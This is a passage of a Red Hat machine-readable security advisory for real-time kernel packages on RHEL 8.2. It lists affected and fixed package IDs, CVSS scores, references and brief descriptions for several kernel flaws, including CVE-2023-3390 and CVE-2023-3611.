"NFV-8.2.0.Z.TUS:kernel-rt-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debuginfo-common-x86_64-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.src",
"RT-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debuginfo-common-x86_64-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H",
"version": "3.1"
},
"products": [
"NFV-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.src",
"NFV-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debuginfo-common-x86_64-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.src",
"RT-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debuginfo-common-x86_64-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "kernel: null-ptr-deref vulnerabilities in sl_tx_timeout in drivers/net/slip"
},
{
"acknowledgments": [
{
"names": [
"Alagu M"
],
"organization": "Salesforce Offensive Security team"
}
],
"cve": "CVE-2023-3390",
"cwe": {
"id": "CWE-416",
"name": "Use After Free"
},
"discovery_date": "2023-06-06T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2213260"
}
],
"notes": [
{
"category": "description",
"text": "A use-after-free flaw was found in the Netfilter subsystem of the Linux kernel when processing named and anonymous sets in batch requests, which can lead to performing arbitrary reads and writes in kernel memory. This flaw allows a local user with CAP_NET_ADMIN capability to crash or potentially escalate their privileges on the system.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "kernel: UAF in nftables when nft_set_lookup_global triggered after handling named and anonymous sets in batch requests",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Only local users with `CAP_NET_ADMIN` capability or root can trigger this issue. \nOn Red Hat Enterprise Linux, local unprivileged users can exploit unprivileged user namespaces (CONFIG_USER_NS) to grant themselves this capability.\n\nThe OpenShift Container Platform (OCP) control planes or master machines are based on Red Hat Enterprise Linux CoreOS (RHCOS) that consists primarily of RHEL components, therefore, it is also affected by this kernel vulnerability. A successful exploit needs necessary privileges (CAP_NET_ADMIN) and direct, local access. A local user in RHCOS is already a root with full permissions, hence existence of this vulnerability does not bring any value from the potential attacker perspective. From the OpenShift containers perspective, this vulnerability cannot be exploited as in OpenShift the cluster processes on the node are namespaced, which means that switching the namespace in the running OpenShift container will not bring necessary capabilities.\nThis means that for OpenShift, the impact of this vulnerability is Low.\n\nSimilar to the CVE-2023-32233 vulnerability, this has been explained in the following blog post as an example of a \"Container escape vulnerability\":\nhttps://www.redhat.com/en/blog/containers-vulnerability-risk-assessment",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"NFV-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.src",
"NFV-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debuginfo-common-x86_64-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.src",
"RT-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debuginfo-common-x86_64-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2023-3390"
},
{
"category": "external",
"summary": "RHBZ#2213260",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2213260"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2023-3390",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-3390"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2023-3390",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-3390"
},
{
"category": "external",
"summary": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=1240eb93f0616b21c675416516ff3d74798fdc97",
"url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=1240eb93f0616b21c675416516ff3d74798fdc97"
}
],
"release_date": "2023-06-08T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-03-12T11:49:04+00:00",
"details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nThe system must be rebooted for this update to take effect.",
"product_ids": [
"NFV-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.src",
"NFV-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debuginfo-common-x86_64-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.src",
"RT-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debuginfo-common-x86_64-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:1269"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"NFV-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.src",
"NFV-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debuginfo-common-x86_64-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.src",
"RT-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debuginfo-common-x86_64-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "kernel: UAF in nftables when nft_set_lookup_global triggered after handling named and anonymous sets in batch requests"
},
{
"cve": "CVE-2023-3611",
"cwe": {
"id": "CWE-787",
"name": "Out-of-bounds Write"
},
"discovery_date": "2023-07-24T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2225191"
}
],
"notes": [
{
"category": "description",
"text": "An out-of-bounds memory write flaw was found in qfq_change_agg in net/sched/sch_qfq.c in the Traffic Control (QoS) subsystem in the Linux kernel. This flaw allows a local user to crash or potentially escalate their privileges on the system.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "kernel: net/sched: sch_qfq component can be exploited if in qfq_change_agg function happens qfq_enqueue overhead",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"NFV-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.src",
"NFV-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debuginfo-common-x86_64-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.src",
"RT-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debuginfo-common-x86_64-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2023-3611"
},
{
"category": "external",
"summary": "RHBZ#2225191",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2225191"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2023-3611",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-3611"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2023-3611",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-3611"
},
{
"category": "external",
"summary": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=3e337087c3b5805fe0b8a46ba622a962880b5d64",
"url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=3e337087c3b5805fe0b8a46ba622a962880b5d64"
}
],
"release_date": "2023-07-21T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-03-12T11:49:04+00:00",
"details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nThe system must be rebooted for this update to take effect.",
"product_ids": [
"NFV-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.src",
"NFV-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
